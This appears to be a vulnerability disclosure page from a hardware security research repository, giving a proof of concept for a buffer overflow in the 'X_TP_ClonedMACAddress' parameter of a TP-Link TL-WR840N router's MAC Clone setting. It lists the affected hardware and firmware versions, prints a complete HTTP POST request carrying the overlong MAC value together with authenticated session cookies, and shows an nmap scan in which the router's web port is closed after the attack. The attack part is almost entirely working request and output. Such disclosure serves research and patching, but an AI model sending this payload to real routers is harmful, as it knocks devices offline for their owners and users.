



 main ▾

...

[Hardware-IoT](#) / `tp-link tl-wr840n_X_TP_ClonedMACAddress=.pdf`

 [Quadron-Research-Lab](#) [Add files via upload](#) [History](#)

 1 contributor

209 KB

...

tp-link tl-wr840n

hardware version: v6.20

firmware version: 0.9.1 4.16 v0001.0 Build 180614 Rel.40494n

Network-> MAC Clone

TP-Link Wireless N Router WR840N
Model No. TL-WR840N

MAC Clone

WAN MAC Address:

Your PC's MAC Address:

App

"X_TP_ClonedMACAddress=" parameter buffer overflow.

```
POST /cgi?242424242424242424242424 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: hu-HU,hu;q=0.9,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 1105
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/mainFrame.htm
Cookie: compact_display_state=false; user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=0f6c4fhe7a7ab754ef4e064d13269f759; JSESSIONID=9a5b68b06e0f5330ab0da99fth111; Authorization=Basic YWRtaW46YWRtaW4=

[WAN_IP_CONF#1,1,1,0,0,0,0,0,0,0,0,0,2
MACAddressOverride=1
X_TP_ClonedMACAddress=3C:91:80:70:B8:3CAAAAAAAAAAAAAAAA]
[WAN_IP_CONF#1,1,2,0,0,0,0,0,0,0,0,0,2
MACAddressOverride=1
```

```
C:\WINDOWS\system32>nmap -sV -PN -p80 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-06 15:52 Kzũp-eur~pai túli ido
Nmap scan report for 192.168.0.1
Host is up (0.0034s latency).

PORT      STATE SERVICE VERSION
80/tcp    closed http
MAC Address: C0:C9:E3:32:6C:12 (Unknown)
```

